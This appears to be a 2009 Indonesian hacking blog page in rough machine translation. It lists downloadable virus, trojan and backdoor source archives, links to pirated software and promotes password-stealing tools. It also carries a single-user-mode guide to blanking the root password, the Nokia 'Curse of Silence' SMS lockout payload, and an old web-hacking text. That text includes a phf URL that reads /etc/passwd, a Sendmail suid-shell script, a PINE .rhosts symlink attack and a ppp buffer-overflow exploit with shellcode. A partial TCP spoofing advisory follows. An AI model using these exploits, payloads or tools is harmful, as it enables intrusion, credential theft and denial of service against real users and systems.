SMILE DEAR GOD: 2009-01-04

virus source code -part 2

Jumat, 09 Januari 2009

http://www.koin.org/files/virii/

[ ] 1992b.zip 17-May-2007 19:08 1k
[ ] Avlist.zip 17-May-2007 19:08 11k
[ ] BULK2.zip 17-May-2007 19:08 60k
[ ] amilia_1.zip 17-May-2007 19:08 1k
[ ] antiexe.zip 17-May-2007 19:08 1k
[ ] antitbav.zip 17-May-2007 19:08 12k
[ ] arab.zip 17-May-2007 19:08 1k
[ ] armagedn.zip 17-May-2007 19:08 12k
[ ] assassin.zip 17-May-2007 19:08 3k
[DIR] backdoors/ 17-May-2007 19:01 -
[ ] beeper.zip 17-May-2007 19:08 2k
[ ] carovil.zip 17-May-2007 19:08 1k
[ ] caser.zip 17-May-2007 19:08 225k
[ ] digpol.zip 17-May-2007 19:08 1k
[ ] eliza.zip 17-May-2007 19:08 1k
[ ] et110.zip 17-May-2007 19:08 13k
[ ] firfly.zip 17-May-2007 19:08 1k
[ ] insuff.zip 17-May-2007 19:08 3k
[ ] inv-evil.zip 17-May-2007 19:08 4k
[DIR] irc bots/ 17-May-2007 19:04 -
[ ] k-hate.zip 17-May-2007 19:08 1k
[ ] krttdemo.zip 17-May-2007 19:08 3k
[ ] logs.zip 17-May-2007 19:08 107k
[ ] lurch.zip 17-May-2007 19:08 2k
[ ] melissa.zip 17-May-2007 19:08 9k
[ ] michael.zip 17-May-2007 19:08 4k
[ ] michelan.zip 17-May-2007 19:08 2k
[ ] nrlg.zip 17-May-2007 19:08 24k
[ ] parasit1.zip 17-May-2007 19:08 1k
[ ] pebbles.zip 17-May-2007 19:08 1k
[ ] plague.zip 17-May-2007 19:08 3k
[DIR] pws/ 17-May-2007 19:04 -
[ ] renexts_1.36.zip 17-May-2007 19:08 23k
[ ] sid.zip 17-May-2007 19:08 51k
[DIR] spybots/ 17-May-2007 19:04 -
[DIR] sub7/ 17-May-2007 19:06 -
[DIR] trojans/ 17-May-2007 19:08 -
[ ] ufester.zip 17-May-2007 19:08 2k
[ ] ultimate.zip 17-May-2007 19:08 1k
[ ] ultimute.zip 17-May-2007 19:08 8k
[ ] unk.zip 17-May-2007 19:08 1k
[ ] unlock.zip 17-May-2007 19:08 1k
[ ] ussr-696.zip 17-May-2007 19:08 1k
[ ] ussr1049.zip 17-May-2007 19:08 1k
[ ] ussr492.zip 17-May-2007 19:08 1k
[ ] ussr711.zip 17-May-2007 19:08 1k
[ ] vip.zip 17-May-2007 19:08 7k
[ ] virii gen 3.zip 17-May-2007 19:08 24k
[ ] virii gen.zip 17-May-2007 19:08 17k
[ ] vxcheck.zip 17-May-2007 19:08 211k
[ ] whocares.zip 17-May-2007 19:08 2k

virus source code - part 1

ttp://www.koin.org/files/virii/trojans/

[ ] AcidShiverSource.zip 17-May-2007 19:06 23k
[ ] AiTrojan4.zip 17-May-2007 19:06 1k
[ ] Amitis1[1].4.3b.zip 17-May-2007 19:06 224k
[ ] BWv0[1].3Beta.zip 17-May-2007 19:06 1k
[ ] BackAtTacK1[1].6.zip 17-May-2007 19:06 420k
[ ] BackLash-Alpha.zip 17-May-2007 19:06 25k
[ ] BioNet_4-0-5.zip 17-May-2007 19:06 13k
[ ] BlackCore_v2[1].1.zip 17-May-2007 19:06 94k
[ ] Blade Run Client.zip 17-May-2007 19:06 168k
[ ] Blade Runner Serv.zip 17-May-2007 19:06 1k
[ ] BoBo.zip 17-May-2007 19:06 2k
[ ] ByPassFireWall.zip 17-May-2007 19:06 1k
[ ] Devil6.zip 17-May-2007 19:07 3k
[ ] Dk_Server_Pub260.zip 17-May-2007 19:07 10k
[ ] Doly16.zip 17-May-2007 19:07 4k
[ ] EvilHTTPServer-0[1]...> 17-May-2007 19:07 2k
[ ] Fantasy-X1[1].3.zip 17-May-2007 19:07 1.4M
[ ] Fiendishperson16.zip 17-May-2007 19:07 1k
[ ] File Injector v2.zip 17-May-2007 19:07 1k
[ ] ForcedControl.zip 17-May-2007 19:07 1k
[ ] FrEaK-v1[1].01.zip 17-May-2007 19:07 116k
[ ] GC12.zip 17-May-2007 19:07 1k
[ ] GreenScreen1[1].0Fre..> 17-May-2007 19:07 1k
[ ] Herman-Agent-1[1].0.rar 17-May-2007 19:07 734k
[ ] Hornet-v1[1].00.zip 17-May-2007 19:07 88k
[ ] LANfiltrator1[1].1fi..> 17-May-2007 19:07 118k
[ ] MafiaDownloaderV1[1]..> 17-May-2007 19:07 86k
[ ] Massaker1[1].2.zip 17-May-2007 19:07 1.3M
[ ] MiniMoClient.zip 17-May-2007 19:07 1k
[ ] PortLess12.zip 17-May-2007 19:07 1k
[ ] Silent Spy-v2[1].10.zip 17-May-2007 19:08 86k
[ ] Sinique10.zip 17-May-2007 19:08 294k
[ ] Spook3[1].0.zip 17-May-2007 19:08 207k
[ ] TechKiller.zip 17-May-2007 19:08 1k
[ ] XtrMLair_v0[1].1.zip 17-May-2007 19:08 46k
[ ] acidShiver.zip 17-May-2007 19:06 27k
[ ] acidhead.zip 17-May-2007 19:06 1k
[ ] bo120.zip 17-May-2007 19:06 38k
[ ] bo121unix.tgz 17-May-2007 19:06 27k
[ ] bo2k_dist_1_0_us.zip 17-May-2007 19:06 43k
[ ] buschtrommel.zip 17-May-2007 19:06 6k
[ ] cafe11.zip 17-May-2007 19:06 7k
[ ] cafe8.zip 17-May-2007 19:06 2k
[ ] cain151.zip 17-May-2007 19:06 1k
[ ] capture.zip 17-May-2007 19:06 1k
[ ] ccobra1_0.zip 17-May-2007 19:07 580k
[ ] coma.zip 17-May-2007 19:07 1k
[ ] darkangel251-1.zip 17-May-2007 19:07 1k
[ ] darkangel251.zip 17-May-2007 19:07 1k
[ ] espionage_selfinstal..> 17-May-2007 19:07 1k
[ ] flux.rar 17-May-2007 19:07 147k
[ ] frenzy.zip 17-May-2007 19:07 1k
[ ] fs122.zip 17-May-2007 19:07 61k
[ ] gf135.zip 17-May-2007 19:07 2k
[ ] hackatack11.zip 17-May-2007 19:07 3k
[ ] hammerstd20.rar 17-May-2007 19:07 751k
[ ] iarefilter106.zip 17-May-2007 19:07 175k
[ ] indoctrination.zip 17-May-2007 19:07 1k
[ ] koko2.zip 17-May-2007 19:07 1k
[ ] lancomBAT.zip 17-May-2007 19:07 12k
[ ] magic25.zip 17-May-2007 19:07 842k
[ ] millenium.zip 17-May-2007 19:07 1k
[ ] mini13a.zip 17-May-2007 19:07 1k
[ ] moddedAcidShiver.zip 17-May-2007 19:07 1k
[ ] neotrojan-1.ZIP 17-May-2007 19:07 1k
[ ] neotrojan.ZIP 17-May-2007 19:07 1k
[ ] netdevil1[1].4.zip 17-May-2007 19:07 115k
[ ] nethack-1.rar 17-May-2007 19:07 372k
[ ] nethack.rar 17-May-2007 19:07 372k
[ ] nk1_2c-1.zip 17-May-2007 19:07 43k
[ ] nk1_2c.zip 17-May-2007 19:07 43k
[ ] oblivionmini.zip 17-May-2007 19:07 3k
[ ] paradise99.zip 17-May-2007 19:07 1k
[ ] remotehackv[1].1.5.c..> 17-May-2007 19:07 454k
[ ] rewind_1[1].4.zip 17-May-2007 19:08 641k
[ ] theth15.zip 17-May-2007 19:08 268k
[ ] thething16.zip 17-May-2007 19:08 4k
[ ] trojancow.zip 17-May-2007 19:08 20k
[ ] trojanfriend1-1[1].0..> 17-May-2007 19:08 1k
[ ] trojanfriend1[1].0.zip 17-May-2007 19:08 1k
[ ] voodoo.zip 17-May-2007 19:08 1k
[ ] wartrojan.zip 17-May-2007 19:08 1k
[ ] zz2[1].0.zip 17-May-2007 19:08 739k

rapidshare links from kaskus universal driver

http://rapid*share.com/files/135517628/100000.Universal.Driver.08.2008_www.softarchive.net.part01.rar
http://rapid*share.com/files/135526201/100000.Universal.Driver.08.2008_www.softarchive.net.part02.rar
http://rapid*share.com/files/135535631/100000.Universal.Driver.08.2008_www.softarchive.net.part03.rar
http://rapid*share.com/files/135544686/100000.Universal.Driver.08.2008_www.softarchive.net.part04.rar
http://rapid*share.com/files/135554105/100000.Universal.Driver.08.2008_www.softarchive.net.part05.rar
http://rapid*share.com/files/135564807/100000.Universal.Driver.08.2008_www.softarchive.net.part06.rar
http://rapid*share.com/files/135575477/100000.Universal.Driver.08.2008_www.softarchive.net.part07.rar
http://rapid*share.com/files/135586192/100000.Universal.Driver.08.2008_www.softarchive.net.part08.rar
http://rapid*share.com/files/135597244/100000.Universal.Driver.08.2008_www.softarchive.net.part09.rar
http://rapid*share.com/files/135607717/100000.Universal.Driver.08.2008_www.softarchive.net.part10.rar
http://rapid*share.com/files/135618409/100000.Universal.Driver.08.2008_www.softarchive.net.part11.rar
http://rapid*share.com/files/135628543/100000.Universal.Driver.08.2008_www.softarchive.net.part12.rar
http://rapid*share.com/files/135639189/100000.Universal.Driver.08.2008_www.softarchive.net.part13.rar
http://rapid*share.com/files/135651090/100000.Universal.Driver.08.2008_www.softarchive.net.part14.rar
http://rapid*share.com/files/135660681/100000.Universal.Driver.08.2008_www.softarchive.net.part15.rar
http://rapid*share.com/files/135669206/100000.Universal.Driver.08.2008_www.softarchive.net.part16.rar

small freeware

[] HashEncoder.zip
make encrypt decrypt

[] HotKey2.2.zip
to make key winamp + jetaudio, so by pressing the button
I have been defined so that muter songs simply press keyb

[] IconCollector.zip
to take kumpulan2 icon in the exe file to file and save

[] ManifestXP.zip
of print screen, do this automatically save what you want to save
so when the need to create a tutorial gk pace to mspaint to save the clipboard

[] OpenDialupXP.zip
dialup password stealing tools

[] OpenPassXP2.2.zip
steal passwords xp

[] PMGetText3.6.zip
[] PMGetText4.0.zip
[] PMGetText4.1.zip
a save from ym pm

[] Sma_Soft_Norooz_1386 ..>
4 program on the old version including PMGetText3

StatusChanger4.1.exe
to change the status ym using the time interval

TaskEnablor.zip
to enable / disable registry and task manager

TaskManagerXP.zip
to display in the proces in the Windows Environment

[] TroMessenger1.2.zip
(YM thief password if the opponent is offline tp apply for ym ver 6 down, now deceased)

Quote: [] Troya1.4.zip
WebRAT (Remote Access tools) remote PC via a web / http

[] YCleanArchive.zip
yahoo messenger tools to clean the Archives of PM

[] YProfileChecker.zip
Yahoo messenger tool to check whether the user profile is still active or not

[] Yahoo9_Multi_Sma_Sof ..>
Yahoo messenger tool for multi login in yahoo messenger

Identify the tricks in the Computer Virus

Perhaps there is in your computer virus or malware, but you would not know. Here are some signs that your computer infected with a virus or malware.

Computer running slow. If you have your computer slower than usual, then you may be exposed to computer viruses or malware. Creator of the virus can send you spam email, directing you to a page or page that your browser to fake, and stake out or steal your important files.

Email random. Many viruses can spread to your email. The virus can spread to the entire contact list in the email address. If you receive an email that displays a word such as "Undeliverable", then it was likely the virus is.

Damage to the Internet browser. If you start the browser 'frozen' or 'dead', your computer may have been infected. Virus happy to use the Internet to disseminate infeksinya. By doing so, the virus will 'eat' out memory or hard disk resource and berimbas to the performance of your browser.

Error messages when booting up. If the startup process for your computer, you then receive an error message, the message is a sign of the other. Malware programs usually also will participate in the startup when you start the computer.

source : beritanet.com

Accessing Root without Password on Linux

Selasa, 06 Januari 2009

Whether bluff again, we will immediately try this technique. First we turn on the computer. After a lilo boot, we type in â € œlinux singleâ € (without the quotes).

example:

BOOT: linux single

If you use Boot lilo the graph, you can press ESC key for lilo boot into text. Remember, if you lilo.conf in LABEL linux not mean you have to change. (See the / etc / lilo.conf)

For example, the label is my default linux-ATUNEZ. So I have a linux-ATUNEZ single.

After that, we just wait and it will automatically become Root. In fact until we're done here, but we will try other ways a more Extreme.

Now we go to the directory /etc with the type cd /etc

copy 4 files below:

1. shadow

2. shadow -

3. passwd

4. passwd -

You can copy to the directory / tmp. Do not forget to meRename 4 copy of the file, for example shadow.old. File a copy of this useful as a backup.

Once finished, now we edit the file that is located in the shadow /etc/shadow. With the way the vi / etc / shadow

* Examples of the contents of the file my shadow:

We remove the $ 1 $ GIVCLBI7 $ cPTcd3oPGjd9fugl4HOUJ0 (the results of the root password that has been in encrypt). If you are, save this file with the press the ESC to continue with: WQ! Enter.

After that we restart the computer to the way a reboot or shutdown-r now.

For the next step we just stay logged in as usual to go to the root (no type linux single). Now we do not need to enter a password to become root.

If you want to return to normal conditions. You live copy 4 earlier backup file to the original, which is in the directory / etc.

Here until we first encounter. How to prevent, please wait for the next article ... bye bye ..

Hacking Nokia Symbian S60 SMS Exploit

Affected Products
=================
All Nokia Series60 2.6, 2.8, 3.0, 3.1 devices, see detailed list at
the end of the document.

Requirements to Execute Attack
==============================
- MSISDN of the target
- mobile phone contract that allows sending of SMS messages
- (almost) any Nokia phone (or some other means of sending SMS
messages with TP-PID set to "Internet Electronic Mail")

Risk Level
==========
Medium (for S60 2.8 and 3.1 devices): Target will not be able to
receive any SMS or MMS messages while the attack is ongoing. After
that, only very limited message receiving is possible until the device
is Factory Resetted

High (for S60 2.6 and 3.0 devices): Target will not be able to receive
any SMS or MMS messages until the device is Factory Resetted

Summary
=======
Emails can be sent via SMS by setting the messages Protocol Identifier
to "Internet Electronic Mail" and formatting the message like this:



If such messages contain an  with more than 32
characters, S60 2.6, 2.8, 3.0 and 3.1 devices are not able to receive
other SMS or MMS messages anymore. 2.6 and 3.0 devices lock up after
only one message, 2.8 and 3.1 devices after 11 messages.

Details
=======
3GPP TS 23.040 specifies a method for sending emails via SMS in
section 3.8 ("SMS and Internet Electronic Mail interworking"). In its
most basic form, such a SMS message starts with the from- (MT-SMS) or
to-email-address (MO-SMS), followed by a space character, and then the
message body. The TP-Procotol-Identifier of the SMS message has to be
set to "Internet Electronic Mail" (value: 50 / 0x32).

It is not specified how such a message should be displayed when
received by the phone. Before S60 2.6, Series60 devices displayed such
messages exactly as they were sent. Starting with S60 2.6, when the
part of the message that should contain the from-address looks
anything like an email address (i.e. it contains an "@" somewhere),
this address is then displayed as the message sender instead of the
usually shown TP-Originating-Address.

If this email address is longer than 32 characters, Series60 2.6, 2.8,
3.0 and 3.1 devices fail to display the message or give any indication
on the user interface that such a message has been received. They do,
however, signal to the SMSC that they received the message by sending
an RP-ACK.

Devices running S60 2.6 or 3.0 will not be able to receive any other
SMS message after that. The user interface does not give any
indication of this situation. The only action to remedy this situation
seems to be a Factory Reset of the device (by entering "*#7370#").

Devices running S60 2.8 or 3.1 react a little different: They do not
lock up until they received at least 11 SMS-email messages with an
email address that is longer than 32 characters. The device will not
be able to receive any other SMS message after that - upon receiving
the next message, the phone will just display a warning that there is
not enough memory to receive further messages and that data should be
deleted first. This message is even displayed on an otherwise
completely "empty" device.

After switching the phone off and on again, it has limited capability
for receiving SMS messages again: If it receives a SMS message that is
split up into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated
Short Messages) it is only able to receive the first part and will
display the "not enough memory" warning again. After powercycling the
device again, it can then receive the second part. If there is a third
part, it has to be powercycled again, and so on.

Also, an attacker now just needs to send one more "Curse Of Silence"
message to lock the phone up again. By always sending yet another one
as soon as the status report for delivery of the previous message is
received, the attacker could completely prevent a target from
receiving any other SMS/MMS messages.

Only Factory Resetting the device will restore its full message
receiving capabilities. Note that, if a backup is made using Nokia
PC-Suite *after* being attacked, the blocking messages are also
backuped and will be sent to the device again when restoring the
backup after the Factory Reset.

Note that not being able to receive SMS messages also means not being
able to receive MMS messages, since they are signalled by sending an
SMS message to the device.

"Curse Of Silence" messages can be generated with any phone or
cellular modem that supports 3GPP TS 27.005 AT commands and with most
Nokia phones also directly from the user interface. For example, on
S60 devices, when in the message editor, the type of the message can
be switched to "E-mail" under "Options" -> "Sending options" ->
"Message sent as". The 6310i conveniently offers a "Write email" menu
entry in the messaging menu.

The simplest form of content for a Curse Of Silence would be something
like "123456789@123456789.1234567890123 " (the digits are used only to
illustrate the length of the "email address" of more than 32
characters). Note the space at the end of the message!


Workaround
==========
None known for the user side.
Until a firmware fix is available, network operators should filter
messages with TP-PID "Internet Electronic Mail" and an email address
of more than 32 characters or reset the TP-PID of these messages to 0.

Credits
=======
Tobias Engel 
November 9, 2008

Many thanks to Frank Rieger for spending countless hours cutting and
editing the video.

Detailed List of Affected Products
==================================
Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable
component is a S60 base functionality, it seems safe to assume that
all devices with these OS versions are affected.

S60 3rd Edition, Feature Pack 1 (S60 3.1):
Nokia E90 Communicator
Nokia E71
Nokia E66
Nokia E51
Nokia N95 8GB
Nokia N95
Nokia N82
Nokia N81 8GB
Nokia N81
Nokia N76
Nokia 6290
Nokia 6124 classic
Nokia 6121 classic
Nokia 6120 classic
Nokia 6110 Navigator
Nokia 5700 XpressMusic

S60 3rd Edition, initial release (S60 3.0):
Nokia E70
Nokia E65
Nokia E62
Nokia E61i
Nokia E61
Nokia E60
Nokia E50
Nokia N93i
Nokia N93
Nokia N92
Nokia N91 8GB
Nokia N91
Nokia N80
Nokia N77
Nokia N73
Nokia N71
Nokia 5500
Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8):
Nokia N90
Nokia N72
Nokia N70

S60 2nd Edition, Feature Pack 2 (S60 2.6):
Nokia 6682
Nokia 6681
Nokia 6680
Nokia 6630

Video download : click here
source : berlin.ccc.de

Hacking Webpages - internet hacking

Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mail that we recieved after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic is proud to release, "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.

Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well.

Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique

Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.

The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).

Telnet and Exploits

Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find everything you need.
It's best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I'm going to list a few below but the list of exploits is endless.

This exploit is known as Sendmail v.8.8.4
It creates a suid program /tmp/x that calls shell as root. This is how you set it up:

cat <<>/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat <<>/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat <<>/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi

and now on to another exploit. I'm going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting
the respective lockfile.

Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.

This was writen by Sean B. Hamor…For this example, hamors is the victim while catluvr is the attacker:

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

now on to another one, this will be the last one that I'm going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on
FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up:

#include
#include
#include

#define BUFFER_SIZE 156 /* size of the bufer to overflow */

#define OFFSET -290 /* number of bytes to jump after the start
of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
int i,j;

buf = malloc(4096);

/* fill start of bufer with nops */

i = BUFFER_SIZE-strlen(execshell);

memset(buf, 0x90, i);
ptr = buf + i;

/* place exploit code into the buffer */

for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;

ptr = (char *)addr_ptr;
*ptr = 0;

setenv("HOME", buf, 1);

execl("/usr/sbin/ppp", "ppp", NULL);
}

Now that you've gotten root "what's next?" Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while you can now upload you pages, delete all the logs and just plain do your worstJ Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learing ethnical hacking that you download our Unix Bible.

~~PSYCHOTIC~~

A simple TCP spoofing attack

Over the past few years TCP sequence number prediction attacks have become a
real threat against unprotected networks, taking advantage of the inherent
trust relationships present in many network installations. TCP sequence
number prediction attacks have most commonly been implemented by opening a
series of connections to the target host, and attempting to predict the
sequence number which will be used next. Many operating systems have
therefore attempted to solve this problem by implementing a method of
generating sequence numbers in unpredictable fashions. This method does
not solve the problem.

This advisory introduces an alternative method of obtaining the initial
sequence number from some common trusted services. The attack presented here
does not require the attacker to open multiple connections, or flood a port
on the trusted host to complete the attack. The only requirement is that
source routed packets can be injected into the target network with fake
source addresses.

This advisory assumes that the reader already has an understanding of how
TCP sequence number prediction attacks are implemented.

The impact of this advisory is greatly diminished due to the large number of
organizations which block source routed packets and packets with addresses
inside of their networks. Therefore we present the information as more of
a 'heads up' message for the technically inclined, and to re-iterate that
the randomization of TCP sequence numbers is not an effective solution
against this attack.

Technical Details
~~~~~~~~~~~~~~~~~

The problem occurs when particular network daemons accept connections
with source routing enabled, and proceed to disable any source routing
options on the connection. The connection is allowed to continue, however
the reverse route is no longer used. An example attack can launched against
the in.rshd daemon, which on most systems will retrieve the socket options
via getsockopt() and then turn off any dangerous options via setsockopt().

An example attack follows.

Host A is the trusted host
Host B is the target host
Host C is the attacker

Host C initiates a source routed connection to in.rshd on host B, pretending
to be host A.

Host C spoofing Host A --> Host B in.rshd

Host B receives the initial SYN packet, creates a new PCB (protocol
control block) and associates the route with the PCB. Host B responds,
using the reverse route, sending back a SYN/ACK with the sequence number.

Host C spoofing Host A <-- Host B in.rshd

Host C responds, still spoofing host A, acknowledging the sequence number.
Source routing options are not required on this packet.

Host C spoofing Host A --> Host B in.rshd

We now have an established connection, the accept() call completes, and
control is now passed to the in.rshd daemon. The daemon now does IP
options checking and determines that we have initiated a source routed
connection. The daemon now turns off this option, and any packets sent
thereafter will be sent to the real host A, no longer using the reverse
route which we have specified. Normally this would be safe, however the
attacking host now knows what the next sequence number will be. Knowing
this sequence number, we can now send a spoofed packet without the source
routing options enabled, pretending to originate from Host A, and our
command will be executed.

In some conditions the flooding of a port on the real host A is required
if larger ammounts of data are sent, to prevent the real host A from
responding with an RST. This is not required in most cases when performing
this attack against in.rshd due to the small ammount of data transmitted.

It should be noted that the sequence number is obtained before accept()
has returned and that this cannot be prevented without turning off source
routing in the kernel.

As a side note, we're very lucky that TCP only associates a source route with
a PCB when the initial SYN is received. If it accepted and changed the ip
options at any point during a connection, more exotic attacks may be possible.
These could include hijacking connections across the internet without playing
a man in the middle attack and being able to bypass IP options checking
imposed by daemons using getsockopt(). Luckily *BSD based TCP/IP stacks will
not do this, however it would be interesting to examine other implementations.

Impact
~~~~~~

The impact of this attack is similar to the more complex TCP sequence
number prediction attack, yet it involves fewer steps, and does not require
us to 'guess' the sequence number. This allows an attacker to execute
arbitrary commands as root, depending on the configuration of the target
system. It is required that trust is present here, as an example, the use
of .rhosts or hosts.equiv files.

Solutions
~~~~~~~~~

The ideal solution to this problem is to have any services which rely on
IP based authentication drop the connection completely when initially
detecting that source routed options are present. Network administrators
and users can take precautions to prevent users outside of their network
from taking advantage of this problem. The solutions are hopefully already
either implemented or being implemented.

1. Block any source routed connections into your networks
2. Block any packets with internal based address from entering your network.

Network administrators should be aware that these attacks can easily be
launched from behind filtering routers and firewalls. Internet service
providers and corporations should ensure that internal users cannot launch
the described attacks. The precautions suggested above should be implemented
to protect internal networks.

Example code to correctly process source routed packets is presented here
as an example. Please let us know if there are any problems with it.
This code has been tested on BSD based operating systems.

u_char optbuf[BUFSIZ/3];
int optsize = sizeof(optbuf), ipproto, i;
struct protoent *ip;

if ((ip = getprotobyname("ip")) != NULL)
ipproto = ip->p_proto;
else
ipproto = IPPROTO_IP;
if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) &&
optsize != 0) {
for (i = 0; i < optsize; ) {
u_char c = optbuf[i];
if (c == IPOPT_LSRR || c == IPOPT_SSRR)
exit(1);
if (c == IPOPT_EOL)
break;
i += (c == IPOPT_NOP) ? 1 : optbuf[i+1];
}
}

One critical concern is in the case where TCP wrappers are being used. If
a user is relying on TCP wrappers, the above fix should be incorporated into
fix_options.c. The problem being that TCP wrappers itself does not close
